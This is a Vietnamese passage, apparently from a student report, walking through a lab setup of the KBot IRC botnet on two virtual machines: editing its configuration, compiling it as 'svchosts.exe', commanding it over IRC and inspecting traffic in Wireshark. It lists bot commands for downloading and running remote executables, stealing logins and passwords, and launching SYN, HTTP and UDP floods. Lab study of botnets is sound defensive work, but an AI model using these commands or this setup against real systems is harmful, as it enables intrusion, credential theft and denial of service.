Phần này xây dựng mơ hình tấn cơng đơn giản, cho phép chúng ta quan sát và hiểu được cơ chế hoạt động của chương trình chỉ huy và điều khiển. Hai máy tính được sử dụng. Cả hai máy đều sử dụng Hệ điều hành Windows XP3 ảo trên VMware Workstation. Máy-một dùng để điều khiển Botnet, cài phần mềm “Visual Studio 2010 untimate x86” để biên dịch mã nguồn Bot và một text IRC Client là Xchat để liên lạc với Bot, chạy Server IRC dựa trên “Beware ircd”. Máy-hai bị nhiễm Bot, được cài “.NET Framework 4.0” để chạy tập tin thực thi Bot.
Trước khi cài đặt Bot lên máy ảo mẫu thì ta cần cấu hình Bot trên máy-ảo-một:
Cấu hình
Bước đầu tiên là cấu hình Bot thơng qua mã nguồn. Chạy tập tin x128.csproj trong thư mục KBot bằng Visual Studio. Cấu hình Bot trên tập tin Program.cs. Ta tiến hành sửa các dịng:
public static string Server = “địa_chỉ_ip_IRC_Server” public static string CHANNEL = “kênh_điều_khiển_Bot”
public static string BotPass = “Mật_khẩu_vào_kênh_để_điều_khiển_Bot” public static string ChanPass = “Mật_khẩu_để_Bot_tham_gia_vào_kênh”
public static string Mutex = "{newmusadasdagasdasdasdasfffzxcxxxxxx}" /*Thay đổi chuỗi Mutex này mỗi khi biên dịch lại Bot.*/
public static string Server = "192.168.0.187"; public static int Port = 6667;
public static string CHANNEL = "#Botchannel"; public static string BotPass = "Botpass";
public static string ChanPass = "chanpass"; public static bool JoinCountryChan = false;
public static string Auth = ""; // leave blank or put like this : fbi.gov its authost public static string Rname = "kBotmod";
Sau khi đã sửa xong ta lưu lại rồi biên dịch Bot. Kết quả của giai đoạn này là tập tin svchosts.exe. Copy tập tin này sang máy-ảo-hai.
Điều khiển theo lệnh (Command and Control)
Sau khi Bot được biên dịch, hai hệ thống sẽ tấn cơng theo kiểu “thủ cơng”. Máy- ảo-một chạy Server IRC, sau đĩ mở Xchat, tạo Server và kết nối đến Kênh để cĩ thể ra lệnh điều khiển cho Bot.
Hình 2.3: Botmaster tham gia kênh chat
Bên máy-ảo-hai, chạy tập tin thực thi svchosts.exe.
Kiểm tra chương trình Xchat bên máy-ảo-một thấy một nickname ngẫu nhiên được tạo ra và tham gia vào kênh chat.
Hình 2.4: Xuất hiện Bot tham gia vào kênh
Để cĩ quyền điều khiển Bot, một cơ chế thẩm định là cần thiết. Cơ chế này thực hiện đơn giản bằng cách gửi một lệnh tới kênh:
!login BotPass
Hình 2.6: Bot sẵn sàng chờ lệnh từ Botmaster
Nếu Bot đã sẵn sàng chờ lệnh của Botmaster, Bot trả lời “Ready boss!” như hình trên. Sau đĩ ta cĩ thể ra lệnh cho Bot. Ví dụ yêu cầu Bot ghé thăm trang web http://google.com.vn:
!visit http://google.com.vn
Sau khi Bot nhận được lệnh, bên máy-ảo-hai trình duyệt tự động mở trang
http://www.google.com.vn.
Trong ví dụ này tơi đưa ra tính năng rất đơn giản. Thực tế, KBot cung cấp một tập hợp rất phong phú các lệnh và chức năng. Một trong số đĩ là:
Lệnh Mơ tả
!login pass Botmaster đăng nhập với mật khẩu để thẩm định !seed url/yourtorrent.torrent
!visit URL Mở URL trong trình duyệt
!visilent URC Ghé thăm URL, ẩn trên máy tính bị nhiễm !dl URL/gay.exe Tải về tập tin thực thi từ URL
!update URL/gay.exe
!kill Gỡ bỏ Bot
!die Ngừng hoạt động của bot
!fz Thu thập tên đăng nhập/mật khẩu
!syn host port threads sockets Tấn cơng TCP SYN
!stopsyn Ngừng tấn cơng TCP SYN
!httpflood host intervals threads
Tấn cơng tràn ngập HTTP
!httpfloodstop Ngừng tấn cơng tràn ngập HTTP !udpfloodstart host intervals
threads Tấn cơng tràn ngập bằng UDP
!udpfloodstop Ngừng tấn cơng tràn ngập bằng UDP
Tại máy-ảo-hai ta dùng phần mềm “wireshark” để bắt gĩi tin. Phân tích gĩi tin thu được, ta nhận thấy để giữ liên lạc giữa Bot và máy chủ IRC, định kỳ Bot gửi thơng điệp PING đến máy chủ IRC, đồng thời máy chủ IRC trả lời Bot bằng thơng điệp PONG.
Hình 2.8: Bot gửi thơng điệp PING tới máy chủ IRC
Hình 2.9: Máy chủ IRC trả lời Bot thơng điệp PONG
Khi Botmaster ra lệnh cho Bot mở trang http://www.google.com.vn thì trong gĩi tin thu được ta thấy lệnh “!visit http://www.google.com.vn” gửi đến Bot từ máy chủ IRC.
Hình 2.10: Botmaster ra lệnh cho Bot
Sau khi Bot đã thực hiện nhiệm vụ, thì trong gĩi tin thu được ta thấy thơng điệp trả lời “Website visited!” gửi từ Bot đến máy chủ IRC.
Hình 2.11: Bot trả lời đã thực hiện lệnh